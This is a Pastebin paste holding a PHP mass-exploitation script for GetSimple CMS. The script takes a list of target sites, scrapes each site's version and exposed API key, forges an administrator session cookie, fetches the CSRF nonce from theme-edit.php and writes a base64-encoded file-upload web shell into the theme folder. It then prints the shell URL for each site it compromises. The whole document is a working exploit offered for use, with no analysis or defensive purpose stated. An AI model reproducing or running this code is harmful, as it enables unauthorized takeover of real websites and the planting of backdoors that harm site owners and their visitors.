SHARE
TWEET

GetSimple CMS RCE Auto Exploit

ToKeiChun Jun 8th, 2019 13 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /**
  3. * @author Con7ext <kreonrinto@gmail.com>
  4. * GetCMS Mass Exploiter
  5. **/
  6. class getCMS{
  7.   public $url;
  8.   public $user;
  9.   public $cookie;
  10.   public $headers;
  11.   public $apikey;
  12.   public $version;
  13.   public $shell;
  14.   public $payload;
  15.   public function __construct($url){
  16.     $this->url = $url;
  17.     $this->user = null;
  18.     $this->cookie = null;
  19.     $this->apikey = null;
  20.     $this->version = null;
  21.     $this->headers = null;
  22.     $this->shell = "0x0x0.php";
  23.     $this->payload = base64_decode("PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snZiddWyduYW1lJ10pKXskbmFtZSA9ICRfRklMRVNbJ2YnXVsnbmFtZSddOyRuMiA9ICRfRklMRVNbJ2YnXVsndG1wX25hbWUnXTtAbW92ZV91cGxvYWRlZF9maWxlKCRuMiwgJG5hbWUpOyBlY2hvICRuYW1lO31lbHNleyBlY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pj4nPiI7fSA/Pg==");
  24.   }
  25.   public function makeRequest($url, $post = null, $header = null){
  26.     $ch = curl_init();
  27.     curl_setopt($ch, CURLOPT_URL, $url);
  28.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  29.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  30.     curl_setopt($ch, CURLOPT_MAXREDIRS, 10);
  31.     if($header && !empty($header)){
  32.       curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
  33.     }
  34.     if($post && !empty($post)){
  35.       curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  36.     }
  37.     $re = curl_exec($ch);
  38.     $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  39.     curl_close($ch);
  40.     return [
  41.       "head" => $http,
  42.       "body" => $re
  43.     ];
  44.   }
  45.   public function genHeader(){
  46.     $this->headers = array("Cookie: ".$this->cookie);
  47.   }
  48.   public function genCookie(){
  49.     $this->cookie = "GS_ADMIN_USERNAME=".$this->user.";".$this->CookieName()."=".$this->CookieValue();
  50.     $this->genHeader();
  51.   }
  52.   public function CookieName(){
  53.     $cname = "getsimple_cookie_".$this->version.$this->apikey;
  54.     $sh = sha1($cname);
  55.     return $sh;
  56.   }
  57.   public function CookieValue(){
  58.     $cvalue = $this->user.$this->apikey;
  59.     $sh = sha1($cvalue);
  60.     return $sh;
  61.   }
  62.   public function version(){
  63.     $meh = $this->makeRequest($this->url."/admin");
  64.     preg_match_all("|src=\"template/js/jquery.getsimple.js\?v=(.*?)\">|", $meh["body"], $vers);
  65.     if(!empty($vers[1][0])){
  66.       $this->version = str_replace(".", "", $vers[1][0]);
  67.       return true;
  68.     }
  69.     else{
  70.       echo "\033[0;31mI can't find Version ;D\n";
  71.       return false;
  72.     }
  73.   }
  74.   public function getApikey(){
  75.     $meh = $this->makeRequest($this->url."/data/other/authorization.xml");
  76.     preg_match_all("|<apikey><\!\[CDATA\[(.*?)\]\]></apikey>|", $meh["body"], $vers);
  77.     if(!empty($vers[1][0])){
  78.       $this->apikey = $vers[1][0];
  79.       return true;
  80.     }
  81.     else{
  82.       echo "\033[0;31mI can't get apikey :D\n";
  83.       return false;
  84.     }
  85.   }
  86.   public function getUser(){
  87.     $meh = $this->makeRequest($this->url."/data/users/");
  88.     if($meh["head"] == 200){
  89.       preg_match_all("|<a href=\"(.*?).xml\">|", $meh["body"], $vers);
  90.       if(!empty($vers[1][0])){
  91.         $this->user = $vers[1][0];
  92.         return true;
  93.       }
  94.       else{
  95.         $this->user = "admin";
  96.         return true;
  97.       }
  98.     }
  99.     else{
  100.       $this->user = "admin";
  101.     }
  102.   }
  103.   public function getNonce(){
  104.     $req = $this->makeRequest($this->url."/admin/theme-edit.php", null, $this->headers);
  105.     preg_match_all("|nonce\" type=\"hidden\" value=\"(.*)\"|", $req["body"], $vers);
  106.     if(!empty($vers[1][0])){
  107.      return $vers[1][0];
  108.     }
  109.     else{
  110.       echo "\033[0;31mi can't find nonce :D\n";
  111.     }
  112.   }
  113.   public function upload(){
  114.     $n = $this->getNonce();
  115.     $data = array(
  116.       "submitsave" => "2",
  117.       "edited_file" => $this->shell,
  118.       "content" => $this->payload,
  119.       "nonce" => $n);
  120.     $req = $this->makeRequest($this->url."/admin/theme-edit.php", $data, $this->headers);
  121.     if(!preg_match("|CSRF detected|", $req["body"])){
  122.       echo "\033[0;32mSuccess -> ".$this->url."/theme/".$this->shell."\n";
  123.     }
  124.     else{
  125.       echo "\033[0;31mFailed\n";
  126.     }
  127.   }
  128.   public function exploit(){
  129.     echo "\n\033[1;37m[+] ".$this->url." [+]\n";
  130.     echo "\033[0;34m[+]Getting Version\n";
  131.     if($this->version()){
  132.       echo "[+]\033[0;34mGetting Apikey\n";
  133.       if($this->getApikey()){
  134.         echo "[+]\033[0;34mGetting User\n";
  135.         if($this->getUser()){
  136.           $this->genCookie();
  137.           echo "[+]\033[0;34mUploading Shell\n";
  138.           $this->upload();
  139.         }
  140.       }
  141.     }
  142.   }
  143. }
  144. $list = $argv[1];
  145. $mek = file_get_contents($list);
  146. $mes = explode("\n", $mek);
  147. foreach($mes as $site){
  148.   $t = new getCMS($site);
  149.   $t->exploit();
  150. }
  151. echo "\033[1;37m";
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top